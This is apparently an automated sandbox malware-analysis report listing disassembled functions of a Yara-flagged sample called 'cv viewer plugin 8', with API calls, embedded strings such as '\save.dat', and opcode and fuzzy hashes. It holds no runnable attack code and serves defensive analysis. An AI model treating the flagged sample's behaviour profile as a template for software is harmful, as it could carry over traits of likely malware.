                                                    • Opcode ID: ac7bcfb2a3ad1000f60a0d496df3467f615ab2d2103e30afcc75f3b58604dddd
                                                    • Instruction ID: b84308ef364bd1f0386dcfb7c1a353d02329f0daddf819c3f88e737b10bde6f5
                                                    • Opcode Fuzzy Hash: ac7bcfb2a3ad1000f60a0d496df3467f615ab2d2103e30afcc75f3b58604dddd
                                                    • Instruction Fuzzy Hash: 6641D1766143039EFB255E69DCC0FFA3BA9AF51660F28001DE9418A2D1EB35E7D0CB64
                                                    APIs
                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,016A4149), ref: 016B13BF
                                                      • Part of subcall function 016A3FDC: __EH_prolog.LIBCMT ref: 016A3FE1
                                                      • Part of subcall function 016A3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 016A3FF3
                                                    • CloseHandle.KERNEL32(00000000), ref: 016B13B4
                                                    • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,016A4149), ref: 016B1400
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,016A4149), ref: 016B14D1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$Event$CreateH_prolog
                                                    • String ID:
                                                    • API String ID: 2825413587-0
                                                    • Opcode ID: eac0273396342aaedbe4752e45314f20fec1be2d95f42387f2aac09941e0aa53
                                                    • Instruction ID: 59946868a12132314b20e507d27227308cbc2c5ec38f92b016d069a8df6891c0
                                                    • Opcode Fuzzy Hash: eac0273396342aaedbe4752e45314f20fec1be2d95f42387f2aac09941e0aa53
                                                    • Instruction Fuzzy Hash: CF51E5B1600305ABDB21CF28DCD479A7BE4FF46228F15462CE96997380E739D845CB95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: a9937a16b76c58c94b28bf15a68adb4139bcec099db716b101ad8f61a228703e
                                                    • Instruction ID: 65aaa89e753f0bdd7d8b665e68efb8da0df282b3814f7b4f998f7838e1811073
                                                    • Opcode Fuzzy Hash: a9937a16b76c58c94b28bf15a68adb4139bcec099db716b101ad8f61a228703e
                                                    • Instruction Fuzzy Hash: 1D419271B00706ABEB288EADCCD05EEBBA6FF44360B15853EE51987390D771D9C18B45
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 016BFF4B
                                                    • __isleadbyte_l.LIBCMT ref: 016BFF79
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 016BFFA7
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 016BFFDD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: f9339177925701f71c9ea0913ecf272987150d055134f08f521b1fc442fde0ba
                                                    • Instruction ID: 4e652931d6740eff5ca4cfca7d24f37565c3b2038a8ff9c92d48b4357ceaaf2d
                                                    • Opcode Fuzzy Hash: f9339177925701f71c9ea0913ecf272987150d055134f08f521b1fc442fde0ba
                                                    • Instruction Fuzzy Hash: 9D319231600246AFEF218E6DCC84BFA7FAAFF42310F1544A9F965872A1D730D891CB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp
                                                    • String ID:
                                                    • API String ID: 1764332673-0
                                                    • Opcode ID: 0a80d8b17744c6479ff892d95519852f079cea994501e088f3a1339b4f9d947d
                                                    • Instruction ID: 5fdede0b9ada468ad07571307efa1c9a8ee6d853fd2327e6e92ef779443d7041
                                                    • Opcode Fuzzy Hash: 0a80d8b17744c6479ff892d95519852f079cea994501e088f3a1339b4f9d947d
                                                    • Instruction Fuzzy Hash: D411D57190025BAFDB249A6CCC84BFA7B75FB11A50F044A5DE9B657390E7309C41C7A1
                                                    APIs
                                                    • htons.WS2_32(?), ref: 016A3DA2
                                                      • Part of subcall function 016A3BD3: __EH_prolog.LIBCMT ref: 016A3BD8
                                                      • Part of subcall function 016A3BD3: std::bad_exception::bad_exception.LIBCMT ref: 016A3BED
                                                    • htonl.WS2_32(00000000), ref: 016A3DB9
                                                    • htonl.WS2_32(00000000), ref: 016A3DC0
                                                    • htons.WS2_32(?), ref: 016A3DD4
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                    • String ID:
                                                    • API String ID: 3882411702-0
                                                    • Opcode ID: feed434a5a37bdba43ca47cdd5b33fe0c8110a82ddd19bf3ac49579a41896ee4
                                                    • Instruction ID: 128e89485f389fd4b24edf20953086c56a42698ba103f2822abd5e65b29f813b
                                                    • Opcode Fuzzy Hash: feed434a5a37bdba43ca47cdd5b33fe0c8110a82ddd19bf3ac49579a41896ee4
                                                    • Instruction Fuzzy Hash: CF117C36600209EFCF119F64DC85AAAB7BAFF49315B00805AFD05DF245D6719E14CBA5
                                                    APIs
                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 016A23D0
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A23DE
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A2401
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A2408
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 4018804020-0
                                                    • Opcode ID: 071feb12c3afc4ca1cbfde0b2f182615a9c20b20b1f7d461712dbd9b361a8861
                                                    • Instruction ID: 546ced414d8b69f351b25ff61b80b3de873f78b796a9f6761f977f4346b940df
                                                    • Opcode Fuzzy Hash: 071feb12c3afc4ca1cbfde0b2f182615a9c20b20b1f7d461712dbd9b361a8861
                                                    • Instruction Fuzzy Hash: 7E11A972200205AFDB209F64DC84B6ABBB9FF51708F5040ADEA019B201E7B2FD11CFA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: ec16a450b7843ae7ded1ee74ae6696adef34b20311f56c4f85376ff89c7c9d45
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: 31014E3200014AFBDF166E98DC81CEE3F26BF18364B498459FE5859171D336C6B1AB81
                                                    APIs
                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 016A24A9
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A24B8
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A24CD
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A24D4
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 4018804020-0
                                                    • Opcode ID: d6e8ec7825bd257085aa09984250815f8fa8c95b0ecaaf014ac7b72cdfa998c1
                                                    • Instruction ID: 26026b3276b5d55bb83a7a8b922f9287d7931538f3bb71cd88adcf750c0385bd
                                                    • Opcode Fuzzy Hash: d6e8ec7825bd257085aa09984250815f8fa8c95b0ecaaf014ac7b72cdfa998c1
                                                    • Instruction Fuzzy Hash: 05F03CB6200205AFDB009F69EC84FAABBBCFF54710F008019FA04C6145D771E960CFA4
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A2009
                                                    • RtlDeleteCriticalSection.NTDLL(?), ref: 016A2028
                                                    • CloseHandle.KERNEL32(00000000), ref: 016A2037
                                                    • CloseHandle.KERNEL32(00000000), ref: 016A204E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                    • String ID:
                                                    • API String ID: 2456309408-0
                                                    • Opcode ID: 08ba967bd23e9e1e8ce799f6bd55be68199b95b4f39c0e7c369056ad7bdfd068
                                                    • Instruction ID: 8f00ed4f3f91a9ef1998afd7d7a9033e844114fe2c6cb7ce8305a682146bb284
                                                    • Opcode Fuzzy Hash: 08ba967bd23e9e1e8ce799f6bd55be68199b95b4f39c0e7c369056ad7bdfd068
                                                    • Instruction Fuzzy Hash: 2A01D1711407059FC738AF58EC087BABBF5FF14705F40456DE94682690DBB4A944CF98
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$H_prologSleep
                                                    • String ID:
                                                    • API String ID: 1765829285-0
                                                    • Opcode ID: b4d9db5a2991769954b0450dccada684e761e1c20bf508522633e3d24eae0dea
                                                    • Instruction ID: f822c576ab0a85a1ca87ef61499e2d3eeadd0359e7f1238983ce2e68831211d1
                                                    • Opcode Fuzzy Hash: b4d9db5a2991769954b0450dccada684e761e1c20bf508522633e3d24eae0dea
                                                    • Instruction Fuzzy Hash: 15F03A76700110EFCB109FA8DCC8BA8BBA4FF09311F0081A9FA1ADB294CB759954CB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog_memmove
                                                    • String ID: &'
                                                    • API String ID: 3529519853-655172784
                                                    • Opcode ID: ccecdf073b7a35267dde7355511789d7b894fe28382144584380ef67e6b8cff5
                                                    • Instruction ID: 80339ac0e00842b2e45c9b8b4dade3122538673984a7eb5e982734f373ce32c0
                                                    • Opcode Fuzzy Hash: ccecdf073b7a35267dde7355511789d7b894fe28382144584380ef67e6b8cff5
                                                    • Instruction Fuzzy Hash: 13617B71D0021A9FDF20EFA8CD80AADBBBAAF54314F50816ED505AB280D771AE45CF65
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,00000000), ref: 00406043
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID: $
                                                    • API String ID: 1807457897-3032137957
                                                    • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                    • Instruction ID: a42b242f0737112a64efb8245030e7df3adc9bcb2e8c8469847d94988edb9e3f
                                                    • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                    • Instruction Fuzzy Hash: 7B413731004158AEEB119754DD89BFB3FE9DB06700F1501F6D58BFB1D3C23949648BAA
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016ACDA9
                                                      • Part of subcall function 016AD367: std::exception::exception.LIBCMT ref: 016AD394
                                                      • Part of subcall function 016ADB7D: __EH_prolog.LIBCMT ref: 016ADB82
                                                      • Part of subcall function 016B3B4C: _malloc.LIBCMT ref: 016B3B64
                                                      • Part of subcall function 016AD3C4: __EH_prolog.LIBCMT ref: 016AD3C9
                                                    Strings
                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 016ACDDF
                                                    • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 016ACDE6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$_mallocstd::exception::exception
                                                    • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                    • API String ID: 1953324306-412195191
                                                    • Opcode ID: e22fd9032f7e40add7b4d12aec6ec76f1bc8c66583663fbadd60529acde5efda
                                                    • Instruction ID: 9bf220dd910027e1a0146fa7cec7ff1e990f499358ce6f27e2ad7b88e2074fbc
                                                    • Opcode Fuzzy Hash: e22fd9032f7e40add7b4d12aec6ec76f1bc8c66583663fbadd60529acde5efda
                                                    • Instruction Fuzzy Hash: 6D21AD71E012599BDB24EFE8DC50AAEBBB9FF64B04F44405DE805AB380DB705A04CB95
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016ACCB4
                                                      • Part of subcall function 016AD290: std::exception::exception.LIBCMT ref: 016AD2BF
                                                      • Part of subcall function 016ADA46: __EH_prolog.LIBCMT ref: 016ADA4B
                                                      • Part of subcall function 016B3B4C: _malloc.LIBCMT ref: 016B3B64
                                                      • Part of subcall function 016AD2EF: __EH_prolog.LIBCMT ref: 016AD2F4
                                                    Strings
                                                    • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 016ACCF1
                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 016ACCEA
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$_mallocstd::exception::exception
                                                    • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                    • API String ID: 1953324306-1943798000
                                                    • Opcode ID: e5087185952e4986066e6c2b0e9b29d8116f495a3ded5bacfb510f9ded7a0eba
                                                    • Instruction ID: 05c98f0436a1b49a2055a324d0efb01f14148b658800faaceace388e4643acd0
                                                    • Opcode Fuzzy Hash: e5087185952e4986066e6c2b0e9b29d8116f495a3ded5bacfb510f9ded7a0eba
                                                    • Instruction Fuzzy Hash: 8721BF71E012899BDB14EFE8DD54AEEBBB5EF60704F44405DE905AB340DB705E04CB99
                                                    APIs
                                                    • _malloc.LIBCMT ref: 016A535D
                                                      • Part of subcall function 016B2FAC: __FF_MSGBANNER.LIBCMT ref: 016B2FC3
                                                      • Part of subcall function 016B2FAC: __NMSG_WRITE.LIBCMT ref: 016B2FCA
                                                      • Part of subcall function 016B2FAC: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 016B2FEF
                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 016A536F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateFolderHeapPathSpecial_malloc
                                                    • String ID: \save.dat
                                                    • API String ID: 4128168839-3580179773
                                                    • Opcode ID: cee10439d44c58758b1479dbffe4a0740122c73d13c9fa8d7e82c413bc217a1a
                                                    • Instruction ID: fb1abdf8329de8ae350e536bc82ef31563d5fb318ce0623867b460dc8991da10
                                                    • Opcode Fuzzy Hash: cee10439d44c58758b1479dbffe4a0740122c73d13c9fa8d7e82c413bc217a1a
                                                    • Instruction Fuzzy Hash: 7E113D729042457BDB25DE698CD09AFFF6BDFC2550F5401ACE84567301EAA21D02C7A0
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A396A
                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 016A39C1
                                                      • Part of subcall function 016A1410: std::exception::exception.LIBCMT ref: 016A1428
                                                      • Part of subcall function 016AA61E: __EH_prolog.LIBCMT ref: 016AA623
                                                      • Part of subcall function 016AA61E: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 016AA632
                                                      • Part of subcall function 016AA61E: __CxxThrowException@8.LIBCMT ref: 016AA651
                                                    Strings
                                                    • Day of month is not valid for year, xrefs: 016A39AC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                    • String ID: Day of month is not valid for year
                                                    • API String ID: 1404951899-1521898139
                                                    • Opcode ID: 3700e688927b87ba94b9fddf2cca2cab414c7d1c2582609290c83e9b2af6713f
                                                    • Instruction ID: 363264c937dc5d85a5386f4f49d0d2398c618200ed3e57e4ad08010feb8fe71c
                                                    • Opcode Fuzzy Hash: 3700e688927b87ba94b9fddf2cca2cab414c7d1c2582609290c83e9b2af6713f
                                                    • Instruction Fuzzy Hash: 8401527691020AAACB04EFD4DC41AFEBBB9FF64A10F40455EE80593200EB745E55CBA9
                                                    APIs
                                                    • std::exception::exception.LIBCMT ref: 016AFB17
                                                    • __CxxThrowException@8.LIBCMT ref: 016AFB2C
                                                      • Part of subcall function 016B3B4C: _malloc.LIBCMT ref: 016B3B64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                    • String ID: bad allocation
                                                    • API String ID: 4063778783-2104205924
                                                    • Opcode ID: d9b90bc4e75427a9ceafd67c206ca22bc5150651c3a86cf80216c5df14a39fc9
                                                    • Instruction ID: 90b2996e1b75fabd8b55f7d6c1249d6466c4d5d248a25cf6dcec006146594f30
                                                    • Opcode Fuzzy Hash: d9b90bc4e75427a9ceafd67c206ca22bc5150651c3a86cf80216c5df14a39fc9
                                                    • Instruction Fuzzy Hash: 4CF0897060030A669F08AA5C8C559FF77EDDF04611F90056EA915D3681EF70FD408555
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A3C1B
                                                    • std::bad_exception::bad_exception.LIBCMT ref: 016A3C30
                                                      • Part of subcall function 016B24B7: std::exception::exception.LIBCMT ref: 016B24C1
                                                      • Part of subcall function 016AA657: __EH_prolog.LIBCMT ref: 016AA65C
                                                      • Part of subcall function 016AA657: __CxxThrowException@8.LIBCMT ref: 016AA685
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                    • String ID: bad cast
                                                    • API String ID: 1300498068-3145022300
                                                    • Opcode ID: 7928f10c41138049e3ef04b14f640074e5ca97b2da6b7eb3e7e2a3631fee82b2
                                                    • Instruction ID: 7a021e03ce00b06ad1d26dedf4b258fbb59a435bafa63e76b30602401d0a9e0b
                                                    • Opcode Fuzzy Hash: 7928f10c41138049e3ef04b14f640074e5ca97b2da6b7eb3e7e2a3631fee82b2
                                                    • Instruction Fuzzy Hash: 21F0A032A001058BC709DF98DC44AEAB775FF61711F1001AEED0A5B241CB76AA46CB94
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A391E
                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 016A393D
                                                      • Part of subcall function 016A1410: std::exception::exception.LIBCMT ref: 016A1428
                                                      • Part of subcall function 016A898C: _memmove.LIBCMT ref: 016A89AC
                                                    Strings
                                                    • Month number is out of range 1..12, xrefs: 016A392C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                    • String ID: Month number is out of range 1..12
                                                    • API String ID: 3258419250-4198407886
                                                    • Opcode ID: eb6a331f5d9cb74e93de8c3ef25e5e58f9004612f6b132877ce6c8f8e22af009
                                                    • Instruction ID: 0562709bfab9190724423c1a5b5804a2c6e8ea6d7a052b93e2ebb5f2d09b0b1e
                                                    • Opcode Fuzzy Hash: eb6a331f5d9cb74e93de8c3ef25e5e58f9004612f6b132877ce6c8f8e22af009
                                                    • Instruction Fuzzy Hash: A0E0D833B401099BC718BF98CC117FDBBB9DB18E10F00019ED80663680DAB12D40CBD9
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A38D2
                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 016A38F1
                                                      • Part of subcall function 016A1410: std::exception::exception.LIBCMT ref: 016A1428
                                                      • Part of subcall function 016A898C: _memmove.LIBCMT ref: 016A89AC
                                                    Strings
                                                    • Year is out of valid range: 1400..10000, xrefs: 016A38E0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                    • String ID: Year is out of valid range: 1400..10000
                                                    • API String ID: 3258419250-2344417016
                                                    • Opcode ID: 949b31961fd2f79dfa064aa6e8e827de6d1da53f2b1f4040c9c2ec43a245cf9f
                                                    • Instruction ID: 0e410a9c6ed1af4939e8556f0b5cff0023e645c0aefc67768cbc43f54f588a60
                                                    • Opcode Fuzzy Hash: 949b31961fd2f79dfa064aa6e8e827de6d1da53f2b1f4040c9c2ec43a245cf9f
                                                    • Instruction Fuzzy Hash: FAE09232B401055BC714FF98CC117FDBBA9DB18A10F00059ED80263680DAB12D40CBD9
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A3886
                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 016A38A5
                                                      • Part of subcall function 016A1410: std::exception::exception.LIBCMT ref: 016A1428
                                                      • Part of subcall function 016A898C: _memmove.LIBCMT ref: 016A89AC
                                                    Strings
                                                    • Day of month value is out of range 1..31, xrefs: 016A3894
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                    • String ID: Day of month value is out of range 1..31
                                                    • API String ID: 3258419250-1361117730
                                                    • Opcode ID: ac1be5dc184f595f95104f4b8db86b5c28a967f36a9c6b3a592adfc32fbe5c5e
                                                    • Instruction ID: 1d4d80ed239d9533e28f4fc6cbd90fc9e62a2813be4ccd99989929cff8722360
                                                    • Opcode Fuzzy Hash: ac1be5dc184f595f95104f4b8db86b5c28a967f36a9c6b3a592adfc32fbe5c5e
                                                    • Instruction Fuzzy Hash: DEE09272B4011557C714AF98CC117FDBBA9EB18A10F40019ED80263680DAB12D44CBD9
                                                    APIs
                                                    • TlsAlloc.KERNEL32 ref: 016A19CC
                                                    • GetLastError.KERNEL32 ref: 016A19D9
                                                      • Part of subcall function 016A1712: __EH_prolog.LIBCMT ref: 016A1717
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocErrorH_prologLast
                                                    • String ID: tss
                                                    • API String ID: 249634027-1638339373
                                                    • Opcode ID: 4bf8e0ac1c78cdf511bb254aef1a9d1ebcc20f8daf8a51a7fcded6e5826d7a1e
                                                    • Instruction ID: 06ab3730f0a7710b9a2689410d46e576ccff8954749d74515126eb2a94e9664f
                                                    • Opcode Fuzzy Hash: 4bf8e0ac1c78cdf511bb254aef1a9d1ebcc20f8daf8a51a7fcded6e5826d7a1e
                                                    • Instruction Fuzzy Hash: 73E08675A142155BC3107B7CDC090ABBBA49A45175F10876AFCB9832D0EB308D50CFD6
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A3BD8
                                                    • std::bad_exception::bad_exception.LIBCMT ref: 016A3BED
                                                      • Part of subcall function 016B24B7: std::exception::exception.LIBCMT ref: 016B24C1
                                                      • Part of subcall function 016AA657: __EH_prolog.LIBCMT ref: 016AA65C
                                                      • Part of subcall function 016AA657: __CxxThrowException@8.LIBCMT ref: 016AA685
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                    • String ID: bad cast
                                                    • API String ID: 1300498068-3145022300
                                                    • Opcode ID: a86e586801ac815cb564332ef4b73298eb257ae09f69d65b2ea21bcadf170d0b
